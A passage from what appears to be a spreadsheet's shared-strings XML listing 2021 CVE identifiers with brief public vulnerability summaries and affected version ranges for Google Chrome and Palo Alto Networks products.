    <t>Incorrect security UI in Web App Installs in Google Chrome on Android prior to 90.0.4430.212 allowed an attacker who convinced a user to install a web application to inject scripts or HTML into a privileged page via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30507</t>
  </si>
  <si>
    <t>Inappropriate implementation in Offline in Google Chrome on Android prior to 90.0.4430.212 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30508</t>
  </si>
  <si>
    <t>Heap buffer overflow in Media Feeds in Google Chrome prior to 90.0.4430.212 allowed an attacker who convinced a user to enable certain features in Chrome to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30509</t>
  </si>
  <si>
    <t>Out of bounds write in Tab Strip in Google Chrome prior to 90.0.4430.212 allowed an attacker who convinced a user to install a malicious extension to perform an out of bounds memory write via a crafted HTML page and a crafted Chrome extension.</t>
  </si>
  <si>
    <t>CVE-2021-3051</t>
  </si>
  <si>
    <t>An improper verification of cryptographic signature vulnerability exists in Cortex XSOAR SAML authentication that enables an unauthenticated network-based attacker with specific knowledge of the Cortex XSOAR instance to access protected resources and perform unauthorized actions on the Cortex XSOAR server. This issue impacts: Cortex XSOAR 5.5.0 builds earlier than 1578677; Cortex XSOAR 6.0.2 builds earlier than 1576452; Cortex XSOAR 6.1.0 builds earlier than 1578663; Cortex XSOAR 6.2.0 builds earlier than 1578666. All Cortex XSOAR instances hosted by Palo Alto Networks are protected from this vulnerability; no additional action is required for these instances.</t>
  </si>
  <si>
    <t>CVE-2021-30510</t>
  </si>
  <si>
    <t>Use after free in Aura in Google Chrome prior to 90.0.4430.212 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30511</t>
  </si>
  <si>
    <t>Out of bounds read in Tab Groups in Google Chrome prior to 90.0.4430.212 allowed an attacker who convinced a user to install a malicious extension to perform an out of bounds memory read via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30512</t>
  </si>
  <si>
    <t>Use after free in Notifications in Google Chrome prior to 90.0.4430.212 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30513</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 90.0.4430.212 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30514</t>
  </si>
  <si>
    <t>Use after free in Autofill in Google Chrome prior to 90.0.4430.212 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30515</t>
  </si>
  <si>
    <t>Use after free in File API in Google Chrome prior to 90.0.4430.212 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30516</t>
  </si>
  <si>
    <t>Heap buffer overflow in History in Google Chrome prior to 90.0.4430.212 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30517</t>
  </si>
  <si>
    <t>CVE-2021-30518</t>
  </si>
  <si>
    <t>Heap buffer overflow in Reader Mode in Google Chrome prior to 90.0.4430.212 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30519</t>
  </si>
  <si>
    <t>Use after free in Payments in Google Chrome prior to 90.0.4430.212 allowed an attacker who convinced a user to install a malicious payments app to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3052</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in the Palo Alto Network PAN-OS web interface enables an authenticated network-based attacker to mislead another authenticated PAN-OS administrator to click on a specially crafted link that performs arbitrary actions in the PAN-OS web interface as the targeted authenticated administrator. This issue impacts: PAN-OS 8.1 versions earlier than 8.1.20; PAN-OS 9.0 versions earlier than 9.0.14; PAN-OS 9.1 versions earlier than 9.1.10; PAN-OS 10.0 versions earlier than 10.0.2. This issue does not affect Prisma Access.</t>
  </si>
  <si>
    <t>CVE-2021-30520</t>
  </si>
  <si>
    <t>Use after free in Tab Strip in Google Chrome prior to 90.0.4430.212 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30521</t>
  </si>
  <si>
    <t>Heap buffer overflow in Autofill in Google Chrome on Android prior to 91.0.4472.77 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30522</t>
  </si>
  <si>
    <t>Use after free in WebAudio in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30523</t>
  </si>
  <si>
    <t>Use after free in WebRTC in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to potentially exploit heap corruption via a crafted SCTP packet.</t>
  </si>
  <si>
    <t>CVE-2021-30524</t>
  </si>
  <si>
    <t>Use after free in TabStrip in Google Chrome prior to 91.0.4472.77 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30525</t>
  </si>
  <si>
    <t>Use after free in TabGroups in Google Chrome prior to 91.0.4472.77 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30526</t>
  </si>
  <si>
    <t>Out of bounds write in TabStrip in Google Chrome prior to 91.0.4472.77 allowed an attacker who convinced a user to install a malicious extension to perform an out of bounds memory write via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30527</t>
  </si>
  <si>
    <t>Use after free in WebUI in Google Chrome prior to 91.0.4472.77 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30528</t>
  </si>
  <si>
    <t>Use after free in WebAuthentication in Google Chrome on Android prior to 91.0.4472.77 allowed a remote attacker who had compromised the renderer process of a user who had saved a credit card in their Google account to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30529</t>
  </si>
  <si>
    <t>Use after free in Bookmarks in Google Chrome prior to 91.0.4472.77 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3053</t>
  </si>
  <si>
    <t>An improper handling of exceptional conditions vulnerability exists in the Palo Alto Networks PAN-OS dataplane that enables an unauthenticated network-based attacker to send specifically crafted traffic through the firewall that causes the service to crash. Repeated attempts to send this request result in denial of service to all PAN-OS services by restarting the device and putting it into maintenance mode. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.9; PAN-OS 10.0 versions earlier than PAN-OS 10.0.5. This issue does not affect Prisma Access.</t>
  </si>
  <si>
    <t>CVE-2021-30530</t>
  </si>
  <si>
    <t>Out of bounds memory access in WebAudio in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30531</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Content Security Policy in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30532</t>
  </si>
  <si>
    <t>CVE-2021-30533</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in PopupBlocker in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to bypass navigation restrictions via a crafted iframe.</t>
  </si>
  <si>
    <t>CVE-2021-30534</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in iFrameSandbox in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30535</t>
  </si>
  <si>
    <t>Double free in ICU in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30536</t>
  </si>
  <si>
    <t>Out of bounds read in V8 in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30537</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in cookies in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to bypass cookie policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30538</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in content security policy in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to bypass content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30539</t>
  </si>
  <si>
    <t>CVE-2021-3054</t>
  </si>
  <si>
    <t>A time-of-check to time-of-use (TOCTOU) race condition vulnerability in the Palo Alto Networks PAN-OS web interface enables an authenticated administrator with permission to upload plugins to execute arbitrary code with root user privileges. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11; PAN-OS 10.0 versions earlier than PAN-OS 10.0.7; PAN-OS 10.1 versions earlier than PAN-OS 10.1.2. This issue does not affect Prisma Access.</t>
  </si>
  <si>
    <t>CVE-2021-30540</t>
  </si>
  <si>
    <t>Incorrect security UI in payments in Google Chrome on Android prior to 91.0.4472.77 allowed a remote attacker to perform domain spoofing via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30541</t>
  </si>
  <si>
    <t>Use after free in V8 in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30542</t>
  </si>
  <si>
    <t>Use after free in Tab Strip in Google Chrome prior to 91.0.4472.77 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30543</t>
  </si>
  <si>
    <t>CVE-2021-30544</t>
  </si>
  <si>
    <t>Use after free in BFCache in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30545</t>
  </si>
  <si>
    <t>Use after free in Extensions in Google Chrome prior to 91.0.4472.101 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30546</t>
  </si>
  <si>
    <t>Use after free in Autofill in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30547</t>
  </si>
  <si>
    <t>Out of bounds write in ANGLE in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30548</t>
  </si>
  <si>
    <t>Use after free in Loader in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30549</t>
  </si>
  <si>
    <t>Use after free in Spell check in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3055</t>
  </si>
  <si>
    <t>An improper restriction of XML external entity (XXE) reference vulnerability in the Palo Alto Networks PAN-OS web interface enables an authenticated administrator to read any arbitrary file from the file system and send a specifically crafted request to the firewall that causes the service to crash. Repeated attempts to send this request result in denial of service to all PAN-OS services by restarting the device and putting it into maintenance mode. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.10; PAN-OS 10.0 versions earlier than PAN-OS 10.0.6. This issue does not affect Prisma Access.</t>
  </si>
  <si>
    <t>CVE-2021-30550</t>
  </si>
  <si>
    <t>Use after free in Accessibility in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30551</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30552</t>
  </si>
  <si>
    <t>Use after free in Extensions in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30553</t>
  </si>
  <si>
    <t>Use after free in Network service in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30554</t>
  </si>
  <si>
    <t>Use after free in WebGL in Google Chrome prior to 91.0.4472.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30555</t>
  </si>
  <si>
    <t>Use after free in Sharing in Google Chrome prior to 91.0.4472.114 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page and user gesture.</t>
  </si>
  <si>
    <t>CVE-2021-30556</t>
  </si>
  <si>
    <t>Use after free in WebAudio in Google Chrome prior to 91.0.4472.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30557</t>
  </si>
  <si>
    <t>Use after free in TabGroups in Google Chrome prior to 91.0.4472.114 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30559</t>
  </si>
  <si>
    <t>Out of bounds write in ANGLE in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3056</t>
  </si>
  <si>
    <t>A memory corruption vulnerability in Palo Alto Networks PAN-OS GlobalProtect Clientless VPN enables an authenticated attacker to execute arbitrary code with root user privileges during SAML authentication. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.9; PAN-OS 10.0 versions earlier than PAN-OS 10.0.1. Prisma Access customers with Prisma Access 2.1 Preferred firewalls are impacted by this issue.</t>
  </si>
  <si>
    <t>CVE-2021-30560</t>
  </si>
  <si>
    <t>Use after free in Blink XSLT in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30561</t>
  </si>
  <si>
    <t>Type Confusion in V8 in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30562</t>
  </si>
  <si>
    <t>Use after free in WebSerial in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30563</t>
  </si>
  <si>
    <t>CVE-2021-30564</t>
  </si>
  <si>
    <t>Heap buffer overflow in WebXR in Google Chrome prior to 91.0.4472.164 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30565</t>
  </si>
  <si>
    <t>Out of bounds write in Tab Groups in Google Chrome on Linux and ChromeOS prior to 92.0.4515.107 allowed an attacker who convinced a user to install a malicious extension to perform an out of bounds memory write via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30566</t>
  </si>
  <si>
    <t>Stack buffer overflow in Printing in Google Chrome prior to 92.0.4515.107 allowed a remote attacker who had compromised the renderer process to potentially exploit stack corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30567</t>
  </si>
  <si>
    <t>Use after free in DevTools in Google Chrome prior to 92.0.4515.107 allowed an attacker who convinced a user to open DevTools to potentially exploit heap corruption via specific user gesture.</t>
  </si>
  <si>
    <t>CVE-2021-30568</t>
  </si>
  <si>
    <t>Heap buffer overflow in WebGL in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30569</t>
  </si>
  <si>
    <t>Use after free in sqlite in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3057</t>
  </si>
  <si>
    <t>A stack-based buffer overflow vulnerability exists in the Palo Alto Networks GlobalProtect app that enables a man-in-the-middle attacker to disrupt system processes and potentially execute arbitrary code with SYSTEM privileges. This issue impacts: GlobalProtect app 5.1 versions earlier than GlobalProtect app 5.1.9 on Windows; GlobalProtect app 5.2 versions earlier than GlobalProtect app 5.2.8 on Windows; GlobalProtect app 5.2 versions earlier than GlobalProtect app 5.2.8 on the Universal Windows Platform; GlobalProtect app 5.3 versions earlier than GlobalProtect app 5.3.1 on Linux.</t>
  </si>
  <si>
    <t>CVE-2021-30571</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in DevTools in Google Chrome prior to 92.0.4515.107 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30572</t>
  </si>
  <si>
    <t>Use after free in Autofill in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30573</t>
  </si>
  <si>
    <t>Use after free in GPU in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30574</t>
  </si>
  <si>
    <t>Use after free in protocol handling in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30575</t>
  </si>
  <si>
    <t>Out of bounds write in Autofill in Google Chrome prior to 92.0.4515.107 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30576</t>
  </si>
  <si>
    <t>Use after free in DevTools in Google Chrome prior to 92.0.4515.107 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30577</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Installer in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to perform local privilege escalation via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-30578</t>
  </si>
  <si>
    <t>Uninitialized use in Media in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30579</t>
  </si>
  <si>
    <t>Use after free in UI framework in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3058</t>
  </si>
  <si>
    <t>An OS command injection vulnerability in the Palo Alto Networks PAN-OS web interface enables an authenticated administrator with permissions to use XML API the ability to execute arbitrary OS commands to escalate privileges. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. This issue does not impact Prisma Access firewalls.</t>
  </si>
  <si>
    <t>CVE-2021-30580</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Android intents in Google Chrome prior to 92.0.4515.107 allowed an attacker who convinced a user to install a malicious application to obtain potentially sensitive information via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30581</t>
  </si>
  <si>
    <t>CVE-2021-30582</t>
  </si>
  <si>
    <t>Inappropriate implementation in Animation in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30583</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in image handling in iOS in Google Chrome on iOS prior to 92.0.4515.107 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30584</t>
  </si>
  <si>
    <t>Incorrect security UI in Downloads in Google Chrome on Android prior to 92.0.4515.107 allowed a remote attacker to perform domain spoofing via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30585</t>
  </si>
  <si>
    <t>Use after free in sensor handling in Google Chrome on Windows prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30586</t>
  </si>
  <si>
    <t>Use after free in dialog box handling in Windows in Google Chrome prior to 92.0.4515.107 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30587</t>
  </si>
  <si>
    <t>Inappropriate implementation in Compositing in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30588</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30589</t>
  </si>
  <si>
    <t>Insufficient validation of untrusted input in Sharing in Google Chrome prior to 92.0.4515.107 allowed a remote attacker to bypass navigation restrictions via a crafted click-to-call link.</t>
  </si>
  <si>
    <t>CVE-2021-3059</t>
  </si>
  <si>
    <t>An OS command injection vulnerability in the Palo Alto Networks PAN-OS management interface exists when performing dynamic updates. This vulnerability enables a man-in-the-middle attacker to execute arbitrary OS commands to escalate privileges. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers that have Prisma Access 2.1 Preferred or Prisma Access 2.1 Innovation firewalls are impacted by this issue.</t>
  </si>
  <si>
    <t>CVE-2021-30590</t>
  </si>
  <si>
    <t>Heap buffer overflow in Bookmarks in Google Chrome prior to 92.0.4515.131 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30591</t>
  </si>
  <si>
    <t>Use after free in File System API in Google Chrome prior to 92.0.4515.131 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30592</t>
  </si>
  <si>
    <t>Out of bounds write in Tab Groups in Google Chrome prior to 92.0.4515.131 allowed an attacker who convinced a user to install a malicious extension to perform an out of bounds memory write via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30593</t>
  </si>
  <si>
    <t>Out of bounds read in Tab Strip in Google Chrome prior to 92.0.4515.131 allowed an attacker who convinced a user to install a malicious extension to perform an out of bounds memory read via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30594</t>
  </si>
  <si>
    <t>Use after free in Page Info UI in Google Chrome prior to 92.0.4515.131 allowed a remote attacker to potentially exploit heap corruption via physical access to the device.</t>
  </si>
  <si>
    <t>CVE-2021-30596</t>
  </si>
  <si>
    <t>Incorrect security UI in Navigation in Google Chrome on Android prior to 92.0.4515.131 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30597</t>
  </si>
  <si>
    <t>Use after free in Browser UI in Google Chrome on Chrome prior to 92.0.4515.131 allowed a remote attacker to potentially exploit heap corruption via physical access to the device.</t>
  </si>
  <si>
    <t>CVE-2021-30598</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 92.0.4515.159 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30599</t>
  </si>
  <si>
    <t>CVE-2021-3060</t>
  </si>
  <si>
    <t>An OS command injection vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software allows an unauthenticated network-based attacker with specific knowledge of the firewall configuration to execute arbitrary code with root user privileges. The attacker must have network access to the GlobalProtect interfaces to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers with Prisma Access 2.1 Preferred and Prisma Access 2.1 Innovation firewalls are impacted by this issue.</t>
  </si>
  <si>
    <t>CVE-2021-30600</t>
  </si>
  <si>
    <t>Use after free in Printing in Google Chrome prior to 92.0.4515.159 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30601</t>
  </si>
  <si>
    <t>Use after free in Extensions API in Google Chrome prior to 92.0.4515.159 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30602</t>
  </si>
  <si>
    <t>Use after free in WebRTC in Google Chrome prior to 92.0.4515.159 allowed an attacker who convinced a user to visit a malicious website to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30603</t>
  </si>
  <si>
    <t>Data race in WebAudio in Google Chrome prior to 92.0.4515.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30604</t>
  </si>
  <si>
    <t>Use after free in ANGLE in Google Chrome prior to 92.0.4515.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-30605</t>
  </si>
  <si>
    <t>Inappropriate implementation in the ChromeOS Readiness Tool installer on Windows prior to 1.0.2.0 loosens DCOM access rights on two objects allowing an attacker to potentially bypass discretionary access controls.</t>
  </si>
  <si>
    <t>CVE-2021-30606</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30606 Use after free in Blink</t>
  </si>
  <si>
    <t>CVE-2021-30607</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30607 Use after free in Permissions</t>
  </si>
  <si>
    <t>CVE-2021-30608</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30608 Use after free in Web Share</t>
  </si>
  <si>
    <t>CVE-2021-30609</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30609 Use after free in Sign-In</t>
  </si>
  <si>
    <t>CVE-2021-3061</t>
  </si>
  <si>
    <t>An OS command injection vulnerability in the Palo Alto Networks PAN-OS command line interface (CLI) enables an authenticated administrator with access to the CLI to execute arbitrary OS commands to escalate privileges. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers that have Prisma Access 2.1 firewalls are impacted by this issue.</t>
  </si>
  <si>
    <t>CVE-2021-30610</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30610 Use after free in Extensions API</t>
  </si>
  <si>
    <t>CVE-2021-30611</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30611 Use after free in WebRTC</t>
  </si>
  <si>
    <t>CVE-2021-30612</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30612 Use after free in WebRTC</t>
  </si>
  <si>
    <t>CVE-2021-30613</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30613 Use after free in Base internals</t>
  </si>
  <si>
    <t>CVE-2021-30614</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30614 Heap buffer overflow in TabStrip</t>
  </si>
  <si>
    <t>CVE-2021-30615</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30615 Cross-origin data leak in Navigation</t>
  </si>
  <si>
    <t>CVE-2021-30616</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30616 Use after free in Media</t>
  </si>
  <si>
    <t>CVE-2021-30617</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30617 Policy bypass in Blink</t>
  </si>
  <si>
    <t>CVE-2021-30618</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30618 Inappropriate implementation in DevTools</t>
  </si>
  <si>
    <t>CVE-2021-30619</t>
  </si>
  <si>
    <t>Chromium: CVE-2021-30619 UI Spoofing in Autofill</t>
  </si>
  <si>
    <t>CVE-2021-3062</t>
  </si>
  <si>
